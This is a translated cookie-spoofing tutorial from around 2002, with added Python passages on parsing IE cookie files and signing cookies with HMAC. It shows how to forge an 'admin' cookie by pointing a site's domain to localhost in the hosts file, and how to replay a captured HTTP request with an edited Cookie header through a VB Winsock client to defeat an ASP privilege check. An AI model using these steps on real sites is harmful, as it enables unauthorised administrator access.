CZY's cookie spoofing tutorial

xiaoxiao2021-03-06  115

----- Generating a cookie file and changing it

I have wanted to write something about cookies for a long time, mainly because there are many articles about them on the Internet, but they actually contain nothing of substance.

First, let's understand what a cookie is. On Windows 98 cookies are stored in the C:\Windows\Cookies directory; on Windows 2000 they are in C:\Documents and Settings\%your username%\Cookies (each file is no larger than 4 KB).

The file name format is: your username @ the web directory of the site that generated the cookie [cookie serial number] .txt

A concrete example: iWam_system@cookie[3].txt

Let's look at a simple cookie file:

Level
admin
www.locking.8u8.com/cookie/
0
1331699712
29536653
4044081984
29528196
*

The first two lines are the cookie's name and value, as set by the page; the third line is the domain name and web directory of the site that the cookie file belongs to.

Note that the file name does not record which page created the cookie file! So cookies set by different pages in the same web directory all get the same file name, except that the number in the square brackets is incremented by 1 for each new cookie file. As for the numbers behind them, I don't understand them :)
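The four numbers after the flags line are easier to read with a small parser. This is an added example, not code from the article: they are two Windows FILETIME timestamps (expiry, then creation), each stored as a low and a high 32-bit half, and decoding them from the record above recovers exactly the expiry the article sets (01-Jan-03 12:00:00 GMT). That is how a forensic look at an IE Cookies directory tells when a cookie file was written and how long the browser will keep sending it; the sample file is a constructed copy of the record shown above.

```python
from datetime import datetime, timedelta, timezone

# Constructed copy of the cookie file shown above. IE stores one record per
# cookie: eight lines followed by a line containing only "*".
SAMPLE_COOKIE_FILE = """Level
admin
www.locking.8u8.com/cookie/
0
1331699712
29536653
4044081984
29528196
*
"""

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(low: int, high: int) -> datetime:
    """A Windows FILETIME counts 100-nanosecond ticks since 1601-01-01 UTC;
    the cookie file writes its two 32-bit halves as decimal integers."""
    ticks = (high << 32) | low
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_ie_cookie_file(text: str) -> list:
    """Parse an IE user@site[n].txt cookie file into a list of cookie dicts."""
    lines = [ln.rstrip("\r") for ln in text.splitlines()]
    records = []
    i = 0
    while i + 8 < len(lines) and lines[i + 8] == "*":
        name, value, site, flags, exp_lo, exp_hi, cre_lo, cre_hi = lines[i:i + 8]
        records.append({
            "name": name,
            "value": value,
            "domain": site.split("/", 1)[0],
            "path": "/" + site.split("/", 1)[1] if "/" in site else "/",
            "flags": int(flags),
            "expires": filetime_to_datetime(int(exp_lo), int(exp_hi)),
            "created": filetime_to_datetime(int(cre_lo), int(cre_hi)),
        })
        i += 9  # skip the record and its "*" terminator
    return records


if __name__ == "__main__":
    for c in parse_ie_cookie_file(SAMPLE_COOKIE_FILE):
        print(f"{c['name']}={c['value']} for {c['domain']}{c['path']} created "
              f"{c['created']:%Y-%m-%d %H:%M:%S} UTC, expires {c['expires']:%Y-%m-%d %H:%M:%S} UTC")
```

The creation timestamp decodes to 2002-11-20, about six weeks before the expiry the page set, which is consistent with the article being written at the end of 2002.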

Let's look at how to generate a cookie. I'll take VBScript as an example:

<script language="vbscript">
document.cookie = "Level" & "=" & "user" & "; expires=Monday, 01-Jan-03 12:00:00 GMT"
MsgBox document.cookie
</script>

Pay special attention to the last part, "; expires=Monday, 01-Jan-03 12:00:00 GMT". It tells the browser how long the created cookie file is valid. Without it, you will not find the cookie in the directory mentioned above. In this example the cookie is valid until 2003, so of course you can find it on your local hard drive.

Also, when document.cookie is used to read the cookie content, the expiry part is not returned (which also makes the site's cookie check convenient). For example, the code above pops up a dialog box showing Level=user.

OK, let's get practical:

My site is www.locking.8u8.com. There are two files in its cookie directory. One is admin1.htm, whose content is the example above. The other is Level1.htm, with the following content:

<script language="vbscript">
co = document.cookie
' take everything after the first "=", i.e. the value of the Level cookie
le = Mid(co, InStr(co, "=") + 1, Len(co) - InStr(co, "="))
If le = "user" Then
    MsgBox "you are a user"
Else
    If le = "admin" Then
        MsgBox "you are a administrator"
    Else
        MsgBox "You Not Login"
    End If
End If
</script>

If you browse admin1.htm first and then Level1.htm, the dialog says "You are a user"; if you browse Level1.htm directly without having browsed admin1.htm, it says "You Not Login". (Note that some people may think of browsing admin1.htm first and then editing the content of the cookie file on the hard disk; of course that does not work.)

OK, our goal is to have Level1.htm say "you are a administrator" when we browse it :)

There are only two ways: 1) hack 8u8 and then find and modify Level1.htm; you can't, and this article won't discuss it.

2) Do cookie spoofing. OK, let's go :)

----------------------------------- (my system environment is Windows 2000 Server with IIS 5)

Step 1: Create a file named admin2.htm with the following content:

document.cookie = "Level" & "=" & "admin" & "; expires=Monday, 01-Jan-03 12:00:00 GMT"

Then put it in a browsable directory named cookie (the cookie directory is under the web root).

Step 2: Find the hosts file in C:\WINNT\System32\drivers\etc and append the following line to it:

127.0.0.1    www.locking.8u8.com

Step 3: Request www.locking.8u8.com/cookie/admin2.htm (this request actually goes to the local machine).

Step 4: Delete the line we added to hosts, then clear IE's history.

Step 5: Now browse www.locking.8u8.com/cookie/level1.htm.

We are now administrator (note that the site name must have the three W's in front).

----- Spoofing the cookie that is sent to the server

In the previous section, the example I gave used a long-lived cookie, which is generated on our local disk. That method is useless for cookies that become invalid as soon as the browser is closed. How do we spoof those?

First we should realize that in the previous section's example, the page that reads the cookie and says "you are a administrator" (Level1.htm) is actually downloaded to my local machine, that is, its cookie check also runs locally. What if the check is on the remote server, for example in an ASP program? How does it read our cookie?

Let's look at the basics first: when we send a GET or POST request to a remote host over HTTP, any cookie for that domain (whether it is held in memory or saved as a file) is sent to the server along with the request.

Here is an actual example:

GET /Ring/admin.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; aspsessionidsstcracts=odmlkjmcocjmnjiedfleLacm

See the last line :)

Now let's look at how the server checks the cookie. I wrote a simple example: there are two ASP files, one named admin.asp and one named level.asp.

----------- Admin.asp ------------------

<% Response.Write Now() %>
<% Response.Write "" ' the HTML string written here did not survive extraction %>
<% Response.Cookies("level") = "user" %>
<% Response.Write "<script>document.write(document.cookie);</script>" %>

----------- Cut here -------------------

----------- Level.asp ------------------

<%
If Request.Cookies("Level") <> "" Then
    Response.Write "<script>document.write(document.cookie);</script>"
    If Request.Cookies("Level") = "user" Then
        Response.Write "<script>alert('you are a user');</script>"
    Else
        If Request.Cookies("Level") = "admin" Then
            Response.Write "<script>alert('you are administrator!');</script>"
            ' record the admin visit in a text file on the server (8 = ForAppending, True = create if missing)
            Set fso1 = Server.CreateObject("Scripting.FileSystemObject")
            Set fil = fso1.OpenTextFile("d:\sms\ring\a.txt", 8, True)
            fil.WriteLine "you are admin!"
            fil.Close
        End If
    End If
Else
    Response.Write "<script>alert('you are not login');</script>"
End If
%>

----------- Cut here -------------------

Explanation: when you request admin.asp, a temporary cookie is generated (it is gone once the browser is closed), so we don't close the browser. When level.asp is requested, it uses Request.Cookies to extract the cookie you sent; if your cookie is admin, it uses the FSO object to create a record file on the server (a.txt; note that when experimenting we must give the directory write permission).
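The weakness level.asp demonstrates is that the server believes whatever value arrives in the Cookie header. As an added example (not code from the article or its ASP files), the Python below puts that check beside a hardened one that only accepts a level the server itself minted, using an HMAC tag over the value with a server-side secret; the cookie name and the level=user / level=admin headers follow the article, while SERVER_SECRET and the session id value are constructed.

```python
import hashlib
import hmac

# Server-side secret; constructed for this example (a real one is random and kept out of source)
SERVER_SECRET = b"constructed-example-secret"


def parse_cookie_header(header: str) -> dict:
    """Split a raw Cookie header value ('a=1; b=2') into a name -> value dict.
    Names are lowercased, matching ASP's case-insensitive Request.Cookies lookup."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name.strip().lower()] = value.strip()
    return cookies


def level_unsigned(cookie_header: str):
    """What level.asp does: return whatever 'level' the client claims.
    Any client that can edit its own request can claim 'admin'."""
    return parse_cookie_header(cookie_header).get("level")


def issue_level_cookie(level: str, secret: bytes = SERVER_SECRET) -> str:
    """Cookie value only the server can mint: '<level>.<HMAC-SHA256(level)>'."""
    tag = hmac.new(secret, level.encode(), hashlib.sha256).hexdigest()
    return f"{level}.{tag}"


def level_signed(cookie_header: str, secret: bytes = SERVER_SECRET):
    """Accept 'level' only if its tag verifies under the server secret; otherwise
    treat the request as not logged in (return None)."""
    raw = parse_cookie_header(cookie_header).get("level")
    if raw is None or "." not in raw:
        return None
    level, tag = raw.rsplit(".", 1)
    expected = hmac.new(secret, level.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    return level


if __name__ == "__main__":
    # Constructed headers: what the browser really sent, and the edited replay from the article
    sent = "level=user; aspsessionidsstcracts=EXAMPLESESSIONID"
    replayed = "level=admin; aspsessionidsstcracts=EXAMPLESESSIONID"
    print("level.asp-style check on replay:", level_unsigned(replayed))  # admin
    print("signed check on replay:", level_signed(replayed))  # None
    print("signed check on minted cookie:", level_signed("level=" + issue_level_cookie("user")))  # user
```

Keeping the privilege level in a server-side session keyed by the session id, rather than in a client cookie at all, removes the problem entirely; the signed cookie is the minimum fix when the value must live on the client.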

OK, enough introduction. Our goal is to make the server generate a.txt and write "you are admin" into it. Use domain name spoofing as in the previous section? No, let's write a Winsock program instead. Let's go :)

Below is a simple example using the VB Winsock control:

-----------------------------------------------------------------

Private Sub Command1_Click()
    Winsock1.RemotePort = Text3.Text  ' the port opened by the remote host, usually 80
    Winsock1.RemoteHost = Text2.Text  ' domain name of the remote host; an IP address also works
    Winsock1.Connect                  ' open a socket connection
    Command1.Enabled = False          ' only one connection at a time, so disable the send button
End Sub

Private Sub Winsock1_Connect()
    Winsock1.SendData Text1.Text      ' once the connection succeeds, send the data
End Sub

Private Sub Command2_Click()
    Winsock1.Close
    Command1.Enabled = True           ' close the connection and re-enable the send button
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)  ' data received; lets us check whether it succeeded
    Dim tmpStr As String
    Winsock1.GetData tmpStr
    Text4.Text = tmpStr
End Sub

----------------------- Cut here --------------------------------------------

OK, let's look at the specific procedure. I use a nice program, Winsock Expert v0.3 beta 1.

Step 1: Open an IE window, then open Winsock Expert and monitor the packets of the IE window just opened.

Step 2: In the IE address bar enter http://61.139.xx.xx/ring/admin.asp, and I see the following data:

GET /Ring/admin.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive

Without closing the browser, now enter http://61.139.xx.xx/ring/level.asp, and we see the following data:

GET /ring/level.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; aspsessionidsstcracts=odmlkjmcocjmnjiedfeLaCM

Step 3: Look at the last line of the data sent the second time: level=user; aspsessionidsstcracts=odmlkjmcocjmnjiedfleLACM is the thing we have to change. Because level.asp checks the cookie with If Request.Cookies("Level") = "admin" Then, we only need to change the last line of the data above to Cookie: level=admin; aspsessionidsstcracts=odmlkjmcocjmnjiedfleLACM

Yes, the part after the semicolon is very important, so I'll say it again :)

Step 4: Paste the modified data into the send box of the program I compiled, and enter the port and domain name...

Step 5: Go to the server and check whether a.txt has been produced with the content "you are admin!".

I won't write more. Mainly, I have done a lot of experiments, so I can release the complete program code for this article:

1. admin.asp and level.asp:
http://locking.8u8.com/cookie/admin.txt and level.txt

2. CookieClient.exe and source code:
http://locking.8u8.com/cookie/cookiesend.zip

3. Winsock Expert:
http://software.tom.com/download.asp?id=7500 or
http://dxqsoft.myrice.com/

Please credit the original source when reposting: https://www.9cbs.com/read-98420.html
